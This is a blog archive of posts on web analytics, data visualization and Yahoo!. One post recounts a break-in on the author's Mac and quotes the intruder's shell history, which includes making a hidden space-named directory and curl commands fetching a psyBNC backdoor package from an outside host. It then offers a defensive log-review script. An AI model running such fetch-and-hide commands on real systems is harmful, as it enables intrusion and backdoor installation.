bobpage.net

Is This the Future of Web Analytics?

January 11th, 2009 by Bob Page

Long ago I mentioned what I called “vertical analytics” and how blogs may be the next analytics frontier. Fast forward to the present, and blog analytics are “been there, done that.” (The product demo I saw in a hotel room at SES never saw the light of day; the originator went on to other things – and remains active in “general” web analytics.)

I still think vertical analytics is bound to happen. Witness Atlanta-based Indie Music, whose service Band Metrics (“Analytics For The Music Industry™”) scored angel financing back in November. More than one press report about the financing used a variant of the phrase “Google Analytics of the music industry.”

Compared with some of the graybeards of Business Intelligence, the Web Analytics “industry” has not yet left adolescence. But I think many of the lessons learned in the greater web analytics field, combined with more powerful machines and a greater “popular culture” around number crunching, are going to lead to analytics for very specialized fields. At a minimum, it might move us away from generic tools that look at the Web and toward tools with specific knowledge of a particular business: kinda like a purpose-built scheduling & billing package for dentists vs. bringing in Oracle Applications and Accenture. What could be bad about that?

Could this be a new analytics growth opportunity, or perhaps just a land grab? Here’s a thought experiment: check out XXXanalytics.com (where XXX is whatever interesting business you can think of) and see if it’s already taken. I tried a half-dozen while composing this post and I was surprised how many were already claimed…

(Interestingly, XXXanalytics.com itself is not taken, nor is dentistanalytics.com.)

New Visualization Sites, Tools and Ideas

January 4th, 2009 by Bob Page

If there’s one thing better than having lots of data, it’s probably visualizing it.

I’ve been coming across new sites and new ideas for visualizing data, and thought I’d mention a few.

One of the things I love about the New York Times is their smart visualizations. The interactive graphic “A Year of Heavy Losses” was a huge hit last fall as the financial meltdown was unfolding (even if the data was scary as hell). Treemaps can be difficult to understand, but this one nailed it.

Even the Times’ day-to-day infographics can be a pleasure to look at. Did you know that the NYT has a Visualization Lab where you can make your own visualizations? It uses IBM’s Many Eyes technology.

FlowingData explores many visual aspects of data. If you haven’t seen their visualization “Watching the Growth of Walmart Across America” (which uses the Modest Maps library), I highly recommend it, but the site has a lot more to discover.

Jeff Clark over at Neoformix continues to produce thought-provoking visualizations, many full of beautiful insight, like this contrast of two speeches, and some, like his visualization of Obama’s victory speech, are just plain “hang on the wall” beautiful (politics aside). I spend way too much time at Neoformix. Rather than single out one post, check out his Neoformix Review 2008 and see if you’re not intrigued. Jeff also links to other interesting visualization sites and projects.

Infographics should tell a story. A map of the US with red and blue states doesn’t really convey the full scale of how the election went. Mark Newman, however, does a good job of showing why geographic area is the wrong way to visualize the data, and of coming up with better alternatives.

Tim Showers’ visualization discussions are worth checking out. I particularly liked his post on the challenges of visualizing multi-level data.

TheStatBot does various dives into data that doesn’t normally get the spotlight, such as which post-processing software gets used on Flickr. They also made a Twitter Wordle of Leo Laporte’s various tweets.

And if you like infoclutter (and we all do, sometimes, right?), check out this dashboard!

Finally, if you’ve made it this far: not really a data visualization, but a fascinating time-lapse movie of all four seasons in a single 40-second video.

Have you seen other interesting visualization ideas?

In 2009

December 31st, 2008 by Bob Page

More fit / Less pizza

More photographs / Less pictures

More Tinderbox and OmniFocus / Less productivity pr0n

More action / Less analysis

More blog posts / Less excuses

More technology / Less meetings

 

May you have appropriately more and less in 2009.

Graphing Yahoo! News Elections Traffic

November 13th, 2008 by Bob Page

Just a quick graph that shows daily page views to Yahoo! News. The green line shows the week before the US elections, while the week of the elections is in blue.

Y! News PVs, US Elections

This comes from our internal numbers; for “competitive reasons” I removed the legend indicating volume — but you can see the site was much busier than the previous week. Uniques, PVs, and PVs per unique all were way up.
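For anyone newer to these metrics: PVs per unique is just page views divided by unique visitors, so it rises when each visitor reads more. Here’s a minimal Python sketch of that arithmetic. It assumes a hypothetical list of (visitor_id, url) page-view events and counts each distinct visitor ID (say, a cookie) as one unique; `traffic_summary` and `percent_change` are illustrative names, not how Yahoo! computes these numbers internally, and the events are made up.

```python
def traffic_summary(events):
    """Summarize (visitor_id, url) page-view events.

    Returns (page_views, uniques, pvs_per_unique). A "unique" here is simply
    a distinct visitor_id, so cookie deletion inflates the count.
    """
    page_views = len(events)
    uniques = len({visitor_id for visitor_id, _url in events})
    pvs_per_unique = page_views / uniques if uniques else 0.0
    return page_views, uniques, pvs_per_unique


def percent_change(before, after):
    """Change from before to after, as a percentage of before."""
    return (after - before) / before * 100.0


# Made-up events for two weeks (hypothetical data, for illustration only).
week_before = [("a", "/"), ("a", "/politics"), ("b", "/")]
election_week = [("a", "/"), ("a", "/politics"), ("a", "/results"),
                 ("b", "/"), ("b", "/results"), ("c", "/results")]

pv_before = traffic_summary(week_before)[2]
pv_after = traffic_summary(election_week)[2]
print(f"PVs per unique: {pv_before:.2f} -> {pv_after:.2f} "
      f"({percent_change(pv_before, pv_after):+.0f}%)")
```

With these toy events, page views double (3 to 6) while uniques only go from 2 to 3, so PVs per unique climbs from 1.5 to 2.0, about a 33% jump. All three numbers can rise together, which is what a big news week tends to do.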

TechCrunch showed some data from Hitwise on market share of visits for Nov 4. It’s a little strange that Yahoo! wasn’t listed in the TechCrunch graph, even though Yahoo! placed first overall. It’s also interesting that the Drudge Report ranked so high. Here are the top 10; for more, see Media Life Magazine.

Hitwise ranking of election sites

The Break-in

July 24th, 2008 by Bob Page

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac had been broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up a new user named “test” with a password of... you guessed it. I remember thinking at the time, “don’t pick ‘test’ as a user name, and certainly don’t use it as the password,” but I was in a hurry and did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still hunting for the source of this USB error on my system; it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it had tried until I got to “test” and… it didn’t log in. It didn’t know the password. My first thought was: holy crap, I left that account enabled. Then I thought: how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named “ ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually, that’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer” that can also be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully functioning Mac executable.

Fortunately, that’s the end of the story. There are several lessons here, ones I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security.

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have done all that and then erased every trace of it, but I have enough logging and checks in place to know that they didn’t do anything beyond what’s described above.
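Logging only helps if someone reads the logs. Here’s a minimal Python sketch of the kind of review that would have flagged “test” sooner: tally the user names a scanner tried, and flag any name that also shows a successful login. It assumes OpenSSH-style sshd messages (“Failed password for [invalid user] NAME from IP…”, “Accepted password for NAME from IP…”). Log locations and formats vary by OS and version, so treat the regexes as assumptions; `review_auth_log` is a hypothetical helper, and the sample lines use made-up documentation addresses.

```python
import re
from collections import Counter, defaultdict

# Assumed OpenSSH-style sshd messages; adjust these patterns for your system.
FAILED = re.compile(r"Failed \S+ for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"Accepted \S+ for (\S+) from (\S+)")


def review_auth_log(lines):
    """Scan auth log lines.

    Returns a tuple of:
      failed: Counter of failed login attempts per user name
      accepted: dict mapping user name to the set of addresses that logged in
      suspicious: sorted user names that were both guessed at and logged into
    """
    failed = Counter()
    accepted = defaultdict(set)
    for line in lines:
        match = FAILED.search(line)
        if match:
            failed[match.group(1)] += 1
            continue
        match = ACCEPTED.search(line)
        if match:
            accepted[match.group(1)].add(match.group(2))
    suspicious = sorted(user for user in accepted if user in failed)
    return failed, dict(accepted), suspicious


# Hypothetical log lines, for illustration only.
log = [
    "Jul 21 03:12:01 mac sshd[101]: Accepted password for test from 203.0.113.5 port 40022 ssh2",
    "Jul 24 02:00:01 mac sshd[202]: Failed password for invalid user admin from 198.51.100.7 port 50000 ssh2",
    "Jul 24 02:00:05 mac sshd[203]: Failed password for test from 198.51.100.7 port 50001 ssh2",
]
failed, accepted, suspicious = review_auth_log(log)
print(suspicious)
```

Fed a failed guess at “admin”, a failed guess at “test”, and an earlier accepted password for “test”, it reports `test` as suspicious, the same pattern described above. A name that scanners guess at should never also appear in your successful logins.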

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

Dancing about Architecture

April 25th, 2008 by Bob Page

Blogging about Twitter reminds me that “talking about music is like dancing about architecture”… and I’ve already blogged about Twitter more than once. We’re a good year and a half into Twitter, and while it’s been mildly entertaining, I’m only now starting to see real value. So this post is for the folks still scratching their heads.

There’s a critical mass (or tipping point, if you are so inclined) of people you need to follow before a micro-community emerges. Once that happens, you get two things. The first is quick notification of important/interesting events/news/blog posts. In fact, since I’m following so many web analytics folks, I no longer have to rely on my RSS reader to bring me the big stories; the community points them out. Of course, you need to be following the right people for your interests: people who say interesting things.

The second is the ability to get feedback. I admit I don’t use this a lot, but it can be handy, depending on the size of your community. Of course, it didn’t help me find a 13-year-old copy of Windows…

(In response to Eric’s comment in one of his posts, yeah, my “lazy blogger” tweet to him, welcoming him to Twitter, was paraphrased from something June said to me at eMetrics last spring, about Twitter being the lazy man’s blog. At the time I couldn’t tell if she felt it was a compliment or a condemnation, but now I know.)

Yahoo! is hiring (really!)

April 22nd, 2008 by Bob Page

What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn’t hiring. But in fact, it is. The company “de-invested” in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, and the data team is hiring. In fact we really need help, especially if you know C++ and/or SQL. Details are at http://careers.yahoo.com/

Baseball, Sabermetrics, Freakonomics and Web Analytics

April 9th, 2008 by Bob Page

Great read over on the Freakonomics blog with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:

I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to be misled by them.

We haven’t figured out anything yet. A hundred years from now, we won’t have begun to have the game figured out.

and on who should have the larger role in player evaluations, scouts or stats guys:

Ninety-five percent scouts, five percent stats. [...] the knowledge of who will improve is vastly more important than the knowledge of who is good. Stats can tell you who is good, but they’re almost 100 percent useless when it comes to who will improve.

Yahoo! acquires IndexTools

April 9th, 2008 by Bob Page

Today Yahoo! and IndexTools announced that Yahoo! is acquiring IndexTools. Here is the official press release.

I’m really jazzed about it. IndexTools is a great group that’s been laser-focused on the stuff customers care about. They have a very practical attitude toward their products. Because they started in 2000, they learned from the pioneers and built a deep analytics system that works really well. That much was clear as soon as we popped the hood and poked around inside: unlike a lot of their competitors, they didn’t have an old product and a new product bolted together.

So does this mean we’re going to do “Yahoo! Analytics”, and try to “steal” web sites away from Google Analytics or the commercial web analytics vendors? See, that’s not what this is about. Yahoo! has stated its desire to be a “partner of choice”, and as the new Yahoo! strategy began to sink in, it became clear that the new Yahoo! was going to need to offer a new level of products to its partners. We have many, many thousands of small and medium businesses partnering with us now, and we want to make sure they have the tools they need. We’ve already announced an open strategy where developers can take advantage of Yahoo! products and services; we want to make sure they get the analytics they need too. Yahoo! has so many partners in so many places that can benefit from this technology, it became clear — even obvious — it was now the right thing to do.

Yeah, we still have a team working on analytics solutions for our “owned and operated” world — Yahoo! is too big a customer for IndexTools, or any other commercial vendor for that matter. There’s a world of difference between massive scale for one huge customer, and massive scale for a huge number of small and medium-sized customers. Now we have both.

As for what this means for the web analytics industry, I’ll leave that to the pundits, analysts and fortune tellers.

Here’s some of the combined team after a day of meetings at IndexTools.

IndexTools-Yahoo! Dinner

(and yes, that’s Dennis at the head of the table, farthest away from the camera.)

Some reactions from around the web:

Is Web Analytics Easy or Hard?

April 8th, 2008 by Bob Page

easy button from spackletoe on Flickr

In the words of Bill Clinton, “it depends on what you mean by…”

The “web analytics is easy / hard” discussion among various thought leaders has been interesting, but I can’t help thinking it’s a little self-serving. I had a long, preachy post ready to go, but even I was bored by it. Instead, let me offer some observations:

Technology:

  • Web data is messy. For instance, it doesn’t fit neatly into cubes (think path analysis by segment), so it requires special handling.
  • Web data is noisy. Think robots and cookie deletion.
  • Web analytics is nonstandard. Despite the efforts of the IAB, WAA and others, nobody can say “we use the computation standard to determine this” – because there is no computation standard. Count web 2.0 for me…
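To make “no computation standard” concrete, here’s a minimal Python sketch that counts visits from the same hits under two defensible definitions, a 30-minute versus a 15-minute inactivity timeout, after dropping hits whose user agent looks like a robot. The (visitor_id, unix_timestamp, user_agent) hit format, the bot keyword list, and the function names are assumptions for illustration; real robot filtering is much messier.

```python
BOT_KEYWORDS = ("bot", "crawler", "spider", "slurp")  # hypothetical, far from complete


def is_robot(user_agent):
    """Crude robot check: does the user agent contain a bot-like keyword?"""
    ua = user_agent.lower()
    return any(word in ua for word in BOT_KEYWORDS)


def count_visits(hits, timeout_seconds):
    """Count visits in (visitor_id, unix_timestamp, user_agent) hits.

    Robot hits are dropped. A visitor's first hit starts a visit, and so does
    any hit arriving more than timeout_seconds after that visitor's previous hit.
    """
    last_seen = {}
    visits = 0
    # Sort by visitor, then time, so each visitor's hits are processed in order.
    for visitor, timestamp, user_agent in sorted(hits, key=lambda hit: (hit[0], hit[1])):
        if is_robot(user_agent):
            continue
        previous = last_seen.get(visitor)
        if previous is None or timestamp - previous > timeout_seconds:
            visits += 1
        last_seen[visitor] = timestamp
    return visits


# Made-up hits, for illustration only.
hits = [
    ("a", 0, "Mozilla/5.0"),
    ("a", 20 * 60, "Mozilla/5.0"),  # back after 20 minutes
    ("a", 45 * 60, "Mozilla/5.0"),  # back after another 25 minutes
    ("b", 0, "Googlebot/2.1"),      # robot, dropped
]
print(count_visits(hits, 30 * 60), count_visits(hits, 15 * 60))
```

With one visitor who returns after 20 minutes and again 25 minutes later (plus a Googlebot hit that gets dropped), the 30-minute rule counts 1 visit and the 15-minute rule counts 3. Same data, different answer, and neither is “wrong.”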

If you want to chase the rabbit down the hole, you’ll decide that web analytics is hard. If you want to defer these kinds of things to a tool vendor who will sell you turnkey “best practices,” then web analytics is easy.

Process:

  • In business, speed of deployment is king. Thus it’s easier to look at pre-built reports than create them from scratch.
  • Lack of integration with the business goals means lack of actionability. Most analytics is like driving by looking into the glove box – interesting but irrelevant.
  • As a result of the first two, there’s an emphasis on quantitative over qualitative analysis, which means there’s very little “analytics” at all, just metrics trending.
  • When you don’t first design your analysis from business goals, you grab as much data as you can and pick and choose the data that supports your hypothesis; you end up in either report hell or analysis paralysis. For a very visceral example of this, look at how most people do experimentation.
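Why is cherry-picking so tempting in experimentation? Check enough metrics and something will look like a winner by pure chance. Assuming k independent metrics, each tested at significance level α when nothing actually changed, the chance of at least one false “win” is 1 - (1 - α)^k. Here’s a quick Python sketch of that arithmetic, plus the standard Bonferroni correction (divide α by k) as one conservative remedy; the function names are hypothetical.

```python
def chance_of_false_win(num_metrics, alpha=0.05):
    """Probability that at least one of num_metrics independent tests at
    significance level alpha looks 'significant' when there is no real effect."""
    return 1.0 - (1.0 - alpha) ** num_metrics


def bonferroni_alpha(num_metrics, alpha=0.05):
    """Bonferroni correction: per-metric threshold that keeps the chance of
    any false positive across num_metrics tests at or below alpha."""
    return alpha / num_metrics


for k in (1, 5, 20):
    print(k, round(chance_of_false_win(k), 3), bonferroni_alpha(k))
```

At α = 0.05, one metric gives the expected 5% false-positive rate, but twenty metrics give roughly a 64% chance that at least one looks significant. That’s why deciding up front, from business goals, which metric the experiment is supposed to move matters so much.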

If you design your analytics to meet your strategy, and staff for it, the implementation is long (and complex, yes) but the resulting analytics are easy. If you want to defer to a tool vendor who will sell you turnkey “best practices” then web analytics is hard.
